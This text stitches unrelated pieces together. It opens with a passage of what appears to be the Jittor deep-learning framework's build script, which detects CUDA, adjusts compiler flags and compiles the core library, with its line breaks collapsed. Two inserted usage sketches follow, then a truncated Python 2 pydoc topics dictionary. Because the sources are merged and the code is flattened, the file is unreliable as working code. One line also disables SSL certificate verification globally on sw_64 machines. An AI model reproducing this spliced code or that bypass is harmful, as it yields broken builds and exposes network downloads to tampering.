== -1: try: s = run_cmd( f"{cc_path} {cc_flags} -Xclang -load -Xclang '{so_name}' {test_pass_path}", cache_path_llvm, print_error=False ) except Exception as e: LOG.v(f"Try flag {flag} failed: {e}") continue found_flags_id = i kernel_opt_flags += f" -Xclang -load -Xclang '{so_name}' " break else: LOG.w("Clang is used, but LLVM pass plugin is unable to link.") break LOG.vv(f"Compile extern llvm passes: {str(files)}") def check_cuda(): if not nvcc_path: return global cc_flags, has_cuda, core_link_flags, cuda_dir, cuda_lib, cuda_include, cuda_home, cuda_bin cuda_dir = os.path.dirname(get_full_path_of_executable(nvcc_path)) cuda_bin = cuda_dir cuda_home = os.path.abspath(os.path.join(cuda_dir, "..")) # try default nvidia-cuda-toolkit in Ubuntu 20.04 # assert cuda_dir.endswith("bin") and "cuda" in cuda_dir.lower(), f"Wrong cuda_dir: {cuda_dir}" cuda_include = os.path.abspath(os.path.join(cuda_dir, "..", "include")) cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib64")) if nvcc_path == "/usr/bin/nvcc": # this nvcc is install by package manager cuda_lib = "/usr/lib/x86_64-linux-gnu" cuda_include2 = os.path.join(jittor_path, "extern","cuda","inc") cc_flags += f" -DHAS_CUDA -I\"{cuda_include}\" -I\"{cuda_include2}\" " if os.name == 'nt': cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib", "x64")) # cc_flags += f" \"{cuda_lib}\\cudart.lib\" " cuda_lib_path = glob.glob(cuda_bin+"/cudart64*")[0] cc_flags += f" -lcudart -L\"{cuda_lib}\" -L\"{cuda_bin}\" " dll = ctypes.CDLL(cuda_lib_path, dlopen_flags) ret = dll.cudaDeviceSynchronize() assert ret == 0 else: cc_flags += f" -lcudart -L\"{cuda_lib}\" " # ctypes.CDLL(cuda_lib+"/libcudart.so", import_flags) ctypes.CDLL(cuda_lib+"/libcudart.so", dlopen_flags) has_cuda = 1 def check_cache_compile(): files = [ "src/utils/cache_compile.cc", "src/utils/log.cc", "src/utils/tracer.cc", "src/utils/jit_utils.cc", "src/utils/str_utils.cc", ] if os.name == 'nt': files = [ x.replace('/', '\\') for x in files ] global 
jit_utils_core_files jit_utils_core_files = files recompile = compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) if recompile and jit_utils.cc: LOG.e("jit_utils updated, please rerun your command.") sys.exit(0) if not jit_utils.cc: with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() assert jit_utils.cc # recompile, generate cache key compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) def env_or_try_find(name, bname): if name in os.environ: path = os.environ[name] if path != "": version = jit_utils.get_version(path) LOG.i(f"Found {bname}{version} at {path}") return path return try_find_exe(bname) def try_find_exe(*args): try: return find_exe(*args) except: LOG.v(f"{args[0]} not found.") return "" def check_pybt(gdb_path, python_path): if gdb_path=='' or python_path=='': return False return True # TODO: prev we use below code to check has py-bt or nor # but it is too slow, so we comment it, # find a better way to check py-bt exist # ret = sp.getoutput(f"{gdb_path} --batch {python_path} -ex 'help py-bt'") # if 'python frame' in ret: # LOG.v("py-bt found in gdb.") # return True # return False def check_debug_flags(): global is_debug is_debug = 0 if os.environ.get("debug")=="1": is_debug = 1 global cc_flags cc_flags += " -g -DNODE_MEMCHECK " cc_flags = " " # os.RTLD_NOW | os.RTLD_GLOBAL cause segfault when import torch first import_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND # if cc_type=="icc": # # weird link problem, icc omp library may conflict and cause segfault # import_flags = os.RTLD_NOW | os.RTLD_GLOBAL dlopen_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() jittor_path = find_jittor_path() check_debug_flags() sys.path.append(cache_path) LOG.i(f"Jittor({__version__}) src: {jittor_path}") LOG.i(f"{jit_utils.cc_type} at {jit_utils.cc_path}{jit_utils.get_version(jit_utils.cc_path)}") LOG.i(f"cache_path: {cache_path}") with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() python_path = sys.executable # sometime python do not return the correct sys executable # this will happend when multiple python version installed ex_python_path = python_path + '.' 
+ str(sys.version_info.minor) if os.path.isfile(ex_python_path): python_path = ex_python_path # if jtcuda is already installed nvcc_path = None if install_cuda.has_installation() or os.name == 'nt': nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) # check system installed cuda if not nvcc_path: nvcc_path = env_or_try_find('nvcc_path', 'nvcc') or \ try_find_exe('/usr/local/cuda/bin/nvcc') or \ try_find_exe('/usr/bin/nvcc') or \ try_find_exe('/opt/cuda/bin/nvcc') # if system has no cuda, install jtcuda if not nvcc_path: nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) if nvcc_path is None: nvcc_path = "" gdb_path = env_or_try_find('gdb_path', 'gdb') addr2line_path = try_find_exe('addr2line') has_pybt = check_pybt(gdb_path, python_path) if nvcc_path: # gen cuda key for cache_path cu = "cu" v = jit_utils.get_version(nvcc_path)[1:-1] nvcc_version = list(map(int,v.split('.'))) cu += v try: r, s = sp.getstatusoutput(f"{sys.executable} -m jittor_utils.query_cuda_cc") if r==0: s = sorted(list(set(s.strip().split()))) cu += "_sm_" + "_".join(s) if "cuda_arch" not in os.environ: os.environ["cuda_arch"] = " ".join(cu) except: pass LOG.i("cuda key:", cu) cache_path = os.path.join(cache_path, cu) sys.path.append(cache_path) def check_clang_latest_supported_cpu(): output = run_cmd('clang --print-supported-cpus') apple_cpus = [l.strip() for l in output.split('\n') if 'apple-a' in l] apple_cpus_id = max([int(cpu[7:]) for cpu in apple_cpus]) return f'apple-a{apple_cpus_id}' # cc_flags += " -Wall -Werror -Wno-unknown-pragmas -std=c++14 -fPIC " cc_flags += " -Wall -Wno-unknown-pragmas -std=c++14 -fPIC " # 1. Arch/CPU specific optimization if platform.machine() in ["x86_64", "AMD64"]: cc_flags += " -march=native " elif platform.machine() == 'arm64' and platform.system() == "Darwin": cc_flags += f" -mcpu={check_clang_latest_supported_cpu()} " cc_flags += " -fdiagnostics-color=always " # 2. Non standard include path if platform.system() == 'Darwin' and platform.machine() == 'arm64': cc_flags += " -I/opt/homebrew/include " # 3. 
User specified flags if "cc_flags" in os.environ: cc_flags += os.environ["cc_flags"] + ' ' cc_flags += " -lstdc++ -ldl -shared " if platform.system() == 'Darwin': # TODO: if not using apple clang, there is no need to add -lomp cc_flags += "-undefined dynamic_lookup -lomp " if platform.machine() == "arm64": cc_flags += " -L/opt/homebrew/lib " opt_flags = "" py_include = jit_utils.get_py3_include_path() LOG.v(f"py_include: {py_include}") extension_suffix = jit_utils.get_py3_extension_suffix() lib_suffix = extension_suffix.rsplit(".", 1)[0] LOG.v(f"extension_suffix: {extension_suffix}") so = ".so" if os.name != 'nt' else ".dll" kernel_opt_flags = os.environ.get("kernel_flags", "") + opt_flags if platform.system() == 'Darwin': # TODO: if not using apple clang, cannot add -Xpreprocessor kernel_opt_flags += " -Xpreprocessor -fopenmp " elif cc_type != 'cl': kernel_opt_flags += " -fopenmp " def fix_cl_flags(cmd): output = shsplit(cmd) output2 = [] libpaths = [] for s in output: if s.startswith("-l") and ("cpython" in s or "lib" in s): if platform.system() == 'Darwin': fname = s[2:] + ".so" for path in reversed(libpaths): full = os.path.join(path, fname).replace("\"", "") if os.path.isfile(full): output2.append(full) break else: output2.append(s) else: output2.append(f"-l:{s[2:]}.so") elif s.startswith("-L"): libpaths.append(s[2:]) output2.append(f"{s} -Wl,-rpath,{s[2:]}") else: output2.append(s) return " ".join(output2) if os.name == 'nt': if cc_type == 'g++': pass elif cc_type == 'cl': py3_link_path = os.path.join( os.path.dirname(sys.executable), "libs", ) cc_flags = remove_flags(cc_flags, ["-f", "-m"]) cc_flags = cc_flags.replace("-std=c++14", "-std=c++17") cc_flags = cc_flags.replace("-lstdc++", "") cc_flags = cc_flags.replace("-ldl", "") cc_flags += f" -L\"{py3_link_path}\" -lpython3{sys.version_info.minor} " cc_flags += " -EHa -MD " import jittor_utils if jittor_utils.msvc_path: mp = jittor_utils.msvc_path cc_flags += f' -nologo -I"{mp}\\VC\\include" -I"{mp}\\win10_kits\\include\\ucrt" -I"{mp}\\win10_kits\\include\\shared" -I"{mp}\\win10_kits\\include\\um" -DNOMINMAX ' cc_flags += f' -L"{mp}\\VC\\lib" -L"{mp}\\win10_kits\\lib\\um\\x64" -L"{mp}\\win10_kits\\lib\\ucrt\\x64" ' win_libpaths = {} def fix_cl_flags(cmd): cmd = cmd.replace(".o ", ".obj ") cmd = cmd.replace(".o\"", ".obj\"") if cmd.endswith(".o"): cmd += "bj" if " -o " in cmd: if " -shared " in cmd: cmd = cmd.replace(" -o ", " -Fe: ") output = shsplit(cmd.split("-Fe:")[1].strip())[0] base_output = os.path.basename(output).split('.')[0] cmd += f" -DEF:\"{output}.def\" -IGNORE:4102 -IGNORE:4197 -IGNORE:4217 " elif " -c -o " in cmd: cmd = cmd.replace(" -c -o ", " -c -Fo: ") flags = shsplit(cmd) output = [] output2 = [] for f in flags: if f.startswith("-link"): pass elif f.startswith("-l"): output2.append(f[2:]+".lib") elif f.startswith("-LIB"): output2.append(f) elif f.startswith("-LD"): output.append(f) elif f.startswith("-L"): path = f[2:].replace("\"", "") if path not in win_libpaths: win_libpaths[path] = 1 os.add_dll_directory(path) os.environ["PATH"] = f";{path};" + os.environ["PATH"] output2.append("-LIBPATH:"+f[2:]) elif ".lib" in f: output2.append(f) elif f.startswith("-DEF:"): output2.append(f) elif f.startswith("-W") or f.startswith("-f"): pass elif f.startswith("-std="): output.append(f.replace("=", ":")) else: output.append(f) cmd = " ".join(output) if len(output2): cmd += " -link " + " ".join(output2) cmd = cmd.replace("-include", "-FI") cmd = cmd.replace("-shared", "-LD") return cmd if ' -O' not in cc_flags: opt_flags += " 
-O2 " kernel_opt_flags += " -Ofast " lto_flags = "" if os.environ.get("enable_lto") == "1": if cc_type == "icc": lto_flags = " -flto -ipo -ipo-c " elif cc_type == "g++": lto_flags = " -flto -fuse-linker-plugin " else: lto_flags = " -flto " make_cache_dir(cache_path) make_cache_dir(os.path.join(cache_path, "jit")) make_cache_dir(os.path.join(cache_path, "obj_files")) make_cache_dir(os.path.join(cache_path, "gen")) make_cache_dir(os.path.join(cache_path, "tmp")) ck_path = os.path.join(cache_path, "checkpoints") make_cache_dir(ck_path) # build cache_compile cc_flags += f" -I\"{os.path.join(jittor_path, 'src')}\" " cc_flags += py_include check_cache_compile() LOG.v(f"Get cache_compile: {jit_utils.cc}") # check cuda has_cuda = 0 check_cuda() nvcc_flags = os.environ.get("nvcc_flags", "") if has_cuda: nvcc_flags += cc_flags def convert_nvcc_flags(nvcc_flags): # nvcc don't support -Wall option if os.name == 'nt': nvcc_flags = nvcc_flags.replace("-fp:", "-Xcompiler -fp:") nvcc_flags = nvcc_flags.replace("-EH", "-Xcompiler -EH") nvcc_flags = nvcc_flags.replace("-M", "-Xcompiler -M") nvcc_flags = nvcc_flags.replace("-nologo", "") nvcc_flags = nvcc_flags.replace("-std:", "-std=") nvcc_flags = nvcc_flags.replace("-Fo:", "-o") nvcc_flags = nvcc_flags.replace("-LD", "-shared") nvcc_flags = nvcc_flags.replace("-LIBPATH:", "-L") nvcc_flags = nvcc_flags.replace("-link", "") def func(x): if ".lib" not in x: return x x = x.replace("\"", "") a = os.path.dirname(x) b = os.path.basename(x) if not b.endswith(".lib"): return x return f"-L\"{a}\" -l{b[:-4]}" nvcc_flags = map_flags(nvcc_flags, func) if nvcc_version >= [11,4]: nvcc_flags = nvcc_flags.replace("-std=c++17", "-std=c++14 -Xcompiler -std:c++14") else: nvcc_flags = nvcc_flags.replace("-std=c++17", "") nvcc_flags = nvcc_flags.replace("-Wall", "") nvcc_flags = nvcc_flags.replace("-Wno-unknown-pragmas", "") nvcc_flags = nvcc_flags.replace("-fopenmp", "") nvcc_flags = nvcc_flags.replace("-march", "-Xcompiler -march") nvcc_flags = nvcc_flags.replace("-Werror", "") nvcc_flags = nvcc_flags.replace("-fPIC", "-Xcompiler -fPIC") nvcc_flags = nvcc_flags.replace("-fdiagnostics", "-Xcompiler -fdiagnostics") nvcc_flags += f" -x cu --cudart=shared -ccbin=\"{cc_path}\" --use_fast_math " # nvcc warning is noise nvcc_flags += " -w " nvcc_flags += f" -I\"{os.path.join(jittor_path, 'extern/cuda/inc')}\" " if os.environ.get("cuda_debug", "0") == "1": nvcc_flags += " -G " return nvcc_flags nvcc_flags = convert_nvcc_flags(nvcc_flags) # build core gen_jit_flags() gen_jit_tests() op_headers = glob.glob(jittor_path+"/src/ops/**/*op.h", recursive=True) jit_src = gen_jit_op_maker(op_headers) LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_op_maker.h"), 'w') as f: f.write(jit_src) cc_flags += f' -I\"{cache_path}\" -L\"{cache_path}\" -L\"{jit_utils.cache_path}\" ' # gen pyjt pyjt_gen_src = pyjt_compiler.compile(cache_path, jittor_path) # initialize order: # 1. registers # 2. generate source # 3. op_utils # 4. 
other files2 = pyjt_gen_src ext_args = 'c[cu]' if has_cuda else 'cc' files4 = glob.glob(jittor_path+"/src/**/*."+ext_args, recursive=True) files4 = [ f[len(jittor_path)+1:] for f in files4 ] # files4 = run_cmd('find -L src | grep '+grep_args, jittor_path).splitlines() at_beginning = [ "src/ops/op_utils.cc", "src/event_queue.cc", "src/mem/allocator/sfrl_allocator.cc", "src/mem/allocator.cc", "src/misc/nano_string.cc", ] at_last = [ "src/profiler/profiler.cc", "src/executor.cc", ] if os.name == 'nt': at_beginning = [ x.replace('/','\\') for x in at_beginning ] at_last = [ x.replace('/','\\') for x in at_last ] for i in range(len(at_beginning)): files4.remove(at_beginning[i]) files4.insert(i, at_beginning[i]) for v in at_last: files4.remove(v) files4.append(v) registers = [ name for name in files4 if "register" in name ] for name in registers: files4.remove(name) files = registers + files2 + files4 for file in jit_utils_core_files: files.remove(file) LOG.vv("compile order:", files) if platform.system() == 'Linux': libname = {"clang":"omp", "icc":"iomp5", "g++":"gomp"}[cc_type] libname = ctypes.util.find_library(libname) assert libname is not None, "openmp library not found" ctypes.CDLL(libname, os.RTLD_NOW | os.RTLD_GLOBAL) if platform.machine()=='sw_64': import ssl ssl._create_default_https_context = ssl._create_unverified_context data_gz_path = os.path.join(jittor_path, "utils", "data.gz") use_data_gz = os.path.isfile(data_gz_path) if os.environ.get("use_data_gz", "1") == "0": use_data_gz = False if use_data_gz: import gzip with gzip.open(data_gz_path, 'rb') as f: data = f.read() md5 = hashlib.md5(data).hexdigest() target_md5 = None data_gz_md5_path = os.path.join(cache_path, "data.md5") if os.path.isfile(data_gz_md5_path): with open(data_gz_md5_path, 'r') as f: target_md5 = f.read() data_o_path = os.path.join(cache_path, "data.o") if target_md5 != md5: data_s_path = os.path.join(cache_path, "data.cc") with open(data_s_path, "w") as f: f.write(data.decode("utf8")) dflags = (cc_flags+opt_flags)\ .replace("-Wall", "") \ .replace("-Werror", "") \ .replace("-shared", "") vdp = os.path.join(jittor_path, "src", "utils", "vdp") run_cmd(fix_cl_flags(f"{cc_path} {dflags} -include \"{vdp}\" \"{data_s_path}\" -c -o \"{data_o_path}\"")) os.remove(data_s_path) with open(data_gz_md5_path, 'w') as f: f.write(md5) files.append(data_o_path) files = [f for f in files if "__data__" not in f] cc_flags += f" -l\"jit_utils_core{lib_suffix}\" " compile(cc_path, cc_flags+opt_flags, files, 'jittor_core'+extension_suffix) cc_flags += f" -l\"jittor_core{lib_suffix}\" " # TODO: move to compile_extern.py # compile_extern() with jit_utils.import_scope(import_flags): import jittor_core as core flags = core.Flags() if has_cuda: nvcc_flags = convert_nvcc_flags(cc_flags) nvcc_version = list(jit_utils.get_int_version(nvcc_path)) max_arch = 1000 if nvcc_version < [11,]: max_arch = 75 elif nvcc_version < [11,1]: max_arch = 80 if len(flags.cuda_archs): min_arch = 30 archs = [] for arch in flags.cuda_archs: if arch<min_arch: LOG.w(f"CUDA arch({arch})<{min_arch} is not supported") continue if arch>max_arch: LOG.w(f"CUDA arch({arch})>{max_arch} will be backward-compatible") arch = max_arch archs.append(arch) flags.cuda_archs = archs nvcc_flags += f" -arch=compute_{min(archs)} " nvcc_flags += ''.join(map(lambda x:f' -code=sm_{x} ', archs)) flags.cc_path = cc_path flags.cc_type = cc_type flags.cc_flags = cc_flags + kernel_opt_flags flags.nvcc_path = nvcc_path flags.nvcc_flags = nvcc_flags flags.python_path = python_path 
flags.cache_path = cache_path
flags.jittor_path = jittor_path
flags.gdb_path = gdb_path
flags.addr2line_path = addr2line_path
flags.has_pybt = has_pybt
core.set_lock_path(lock.lock_path)
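# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original build pipeline): the
# quote-aware flag helpers defined above are what fix_cl_flags builds on.
# The expected values below are inferred from the implementations of
# shsplit/remove_flags/moveback_flags/map_flags, not from any documented
# guarantee, so treat them as illustrative assumptions.
if __name__ == "__main__":
    # shsplit keeps quoted arguments intact instead of splitting on the
    # spaces inside the quotes.
    assert shsplit('-I"a b" -O2') == ['-I"a b"', '-O2']
    # remove_flags drops every token that starts or ends with one of the
    # given patterns (quotes are stripped while matching).
    assert remove_flags('-L"/usr/lib" -O2 -shared', ['-L', '-shared']) == '-O2'
    # moveback_flags keeps the same tokens but moves the matched ones to
    # the back, which controls link order.
    assert moveback_flags('-a -L/x -b', ['-L']) == '-a -b -L/x'
    # map_flags applies a callback to every token.
    assert map_flags('-O2 -g', str.upper) == '-O2 -G'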
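# ---------------------------------------------------------------------------
# Illustrative sketch for the descriptor-protocol description in the pydoc
# topic data that follows ('attribute-access'): a minimal data descriptor
# defining __get__/__set__. The names here (Positive, Account) are
# hypothetical examples, not taken from the surrounding sources.
class Positive(object):
    """Data descriptor that rejects non-positive values."""
    def __init__(self, name):
        self.name = name
    def __get__(self, instance, owner):
        if instance is None:
            return self  # class-level access returns the descriptor itself
        return instance.__dict__[self.name]
    def __set__(self, instance, value):
        if value <= 0:
            raise ValueError("%s must be positive" % self.name)
        instance.__dict__[self.name] = value

class Account(object):
    balance = Positive("balance")  # the descriptor lives on the class

if __name__ == "__main__":
    acct = Account()
    acct.balance = 10          # routed through Positive.__set__
    assert acct.balance == 10  # routed through Positive.__get__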
# -*- coding: utf-8 -*- # Autogenerated by Sphinx on Wed Jan 6 03:48:54 2016 topics = {'assert': u'\nThe "assert" statement\n**********************\n\nAssert statements are a convenient way to insert debugging assertions\ninto a program:\n\n assert_stmt ::= "assert" expression ["," expression]\n\nThe simple form, "assert expression", is equivalent to\n\n if __debug__:\n if not expression: raise AssertionError\n\nThe extended form, "assert expression1, expression2", is equivalent to\n\n if __debug__:\n if not expression1: raise AssertionError(expression2)\n\nThese equivalences assume that "__debug__" and "AssertionError" refer\nto the built-in variables with those names. In the current\nimplementation, the built-in variable "__debug__" is "True" under\nnormal circumstances, "False" when optimization is requested (command\nline option -O). The current code generator emits no code for an\nassert statement when optimization is requested at compile time. Note\nthat it is unnecessary to include the source code for the expression\nthat failed in the error message; it will be displayed as part of the\nstack trace.\n\nAssignments to "__debug__" are illegal. The value for the built-in\nvariable is determined when the interpreter starts.\n', 'assignment': u'\nAssignment statements\n*********************\n\nAssignment statements are used to (re)bind names to values and to\nmodify attributes or items of mutable objects:\n\n assignment_stmt ::= (target_list "=")+ (expression_list | yield_expression)\n target_list ::= target ("," target)* [","]\n target ::= identifier\n | "(" target_list ")"\n | "[" target_list "]"\n | attributeref\n | subscription\n | slicing\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn assignment statement evaluates the expression list (remember that\nthis can be a single expression or a comma-separated list, the latter\nyielding a tuple) and assigns the single resulting object to each of\nthe target lists, from left to right.\n\nAssignment is defined recursively depending on the form of the target\n(list). When a target is part of a mutable object (an attribute\nreference, subscription or slicing), the mutable object must\nultimately perform the assignment and decide about its validity, and\nmay raise an exception if the assignment is unacceptable. The rules\nobserved by various types and the exceptions raised are given with the\ndefinition of the object types (see section The standard type\nhierarchy).\n\nAssignment of an object to a target list is recursively defined as\nfollows.\n\n* If the target list is a single target: The object is assigned to\n that target.\n\n* If the target list is a comma-separated list of targets: The\n object must be an iterable with the same number of items as there\n are targets in the target list, and the items are assigned, from\n left to right, to the corresponding targets.\n\nAssignment of an object to a single target is recursively defined as\nfollows.\n\n* If the target is an identifier (name):\n\n * If the name does not occur in a "global" statement in the\n current code block: the name is bound to the object in the current\n local namespace.\n\n * Otherwise: the name is bound to the object in the current global\n namespace.\n\n The name is rebound if it was already bound. 
This may cause the\n reference count for the object previously bound to the name to reach\n zero, causing the object to be deallocated and its destructor (if it\n has one) to be called.\n\n* If the target is a target list enclosed in parentheses or in\n square brackets: The object must be an iterable with the same number\n of items as there are targets in the target list, and its items are\n assigned, from left to right, to the corresponding targets.\n\n* If the target is an attribute reference: The primary expression in\n the reference is evaluated. It should yield an object with\n assignable attributes; if this is not the case, "TypeError" is\n raised. That object is then asked to assign the assigned object to\n the given attribute; if it cannot perform the assignment, it raises\n an exception (usually but not necessarily "AttributeError").\n\n Note: If the object is a class instance and the attribute reference\n occurs on both sides of the assignment operator, the RHS expression,\n "a.x" can access either an instance attribute or (if no instance\n attribute exists) a class attribute. The LHS target "a.x" is always\n set as an instance attribute, creating it if necessary. Thus, the\n two occurrences of "a.x" do not necessarily refer to the same\n attribute: if the RHS expression refers to a class attribute, the\n LHS creates a new instance attribute as the target of the\n assignment:\n\n class Cls:\n x = 3 # class variable\n inst = Cls()\n inst.x = inst.x + 1 # writes inst.x as 4 leaving Cls.x as 3\n\n This description does not necessarily apply to descriptor\n attributes, such as properties created with "property()".\n\n* If the target is a subscription: The primary expression in the\n reference is evaluated. It should yield either a mutable sequence\n object (such as a list) or a mapping object (such as a dictionary).\n Next, the subscript expression is evaluated.\n\n If the primary is a mutable sequence object (such as a list), the\n subscript must yield a plain integer. If it is negative, the\n sequence\'s length is added to it. The resulting value must be a\n nonnegative integer less than the sequence\'s length, and the\n sequence is asked to assign the assigned object to its item with\n that index. If the index is out of range, "IndexError" is raised\n (assignment to a subscripted sequence cannot add new items to a\n list).\n\n If the primary is a mapping object (such as a dictionary), the\n subscript must have a type compatible with the mapping\'s key type,\n and the mapping is then asked to create a key/datum pair which maps\n the subscript to the assigned object. This can either replace an\n existing key/value pair with the same key value, or insert a new\n key/value pair (if no key with the same value existed).\n\n* If the target is a slicing: The primary expression in the\n reference is evaluated. It should yield a mutable sequence object\n (such as a list). The assigned object should be a sequence object\n of the same type. Next, the lower and upper bound expressions are\n evaluated, insofar they are present; defaults are zero and the\n sequence\'s length. The bounds should evaluate to (small) integers.\n If either bound is negative, the sequence\'s length is added to it.\n The resulting bounds are clipped to lie between zero and the\n sequence\'s length, inclusive. Finally, the sequence object is asked\n to replace the slice with the items of the assigned sequence. 
The\n length of the slice may be different from the length of the assigned\n sequence, thus changing the length of the target sequence, if the\n object allows it.\n\n**CPython implementation detail:** In the current implementation, the\nsyntax for targets is taken to be the same as for expressions, and\ninvalid syntax is rejected during the code generation phase, causing\nless detailed error messages.\n\nWARNING: Although the definition of assignment implies that overlaps\nbetween the left-hand side and the right-hand side are \'safe\' (for\nexample "a, b = b, a" swaps two variables), overlaps *within* the\ncollection of assigned-to variables are not safe! For instance, the\nfollowing program prints "[0, 2]":\n\n x = [0, 1]\n i = 0\n i, x[i] = 1, 2\n print x\n\n\nAugmented assignment statements\n===============================\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'atom-identifiers': u'\nIdentifiers (Names)\n*******************\n\nAn identifier occurring as an atom is a name. See section Identifiers\nand keywords for lexical definition and section Naming and binding for\ndocumentation of naming and binding.\n\nWhen the name is bound to an object, evaluation of the atom yields\nthat object. When a name is not bound, an attempt to evaluate it\nraises a "NameError" exception.\n\n**Private name mangling:** When an identifier that textually occurs in\na class definition begins with two or more underscore characters and\ndoes not end in two or more underscores, it is considered a *private\nname* of that class. Private names are transformed to a longer form\nbefore code is generated for them. The transformation inserts the\nclass name, with leading underscores removed and a single underscore\ninserted, in front of the name. 
For example, the identifier "__spam"\noccurring in a class named "Ham" will be transformed to "_Ham__spam".\nThis transformation is independent of the syntactical context in which\nthe identifier is used. If the transformed name is extremely long\n(longer than 255 characters), implementation defined truncation may\nhappen. If the class name consists only of underscores, no\ntransformation is done.\n', 'atom-literals': u"\nLiterals\n********\n\nPython supports string literals and various numeric literals:\n\n literal ::= stringliteral | integer | longinteger\n | floatnumber | imagnumber\n\nEvaluation of a literal yields an object of the given type (string,\ninteger, long integer, floating point number, complex number) with the\ngiven value. The value may be approximated in the case of floating\npoint and imaginary (complex) literals. See section Literals for\ndetails.\n\nAll literals correspond to immutable data types, and hence the\nobject's identity is less important than its value. Multiple\nevaluations of literals with the same value (either the same\noccurrence in the program text or a different occurrence) may obtain\nthe same object or a different object with the same value.\n", 'attribute-access': u'\nCustomizing attribute access\n****************************\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. 
This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n===========================================\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n========================\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n====================\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects 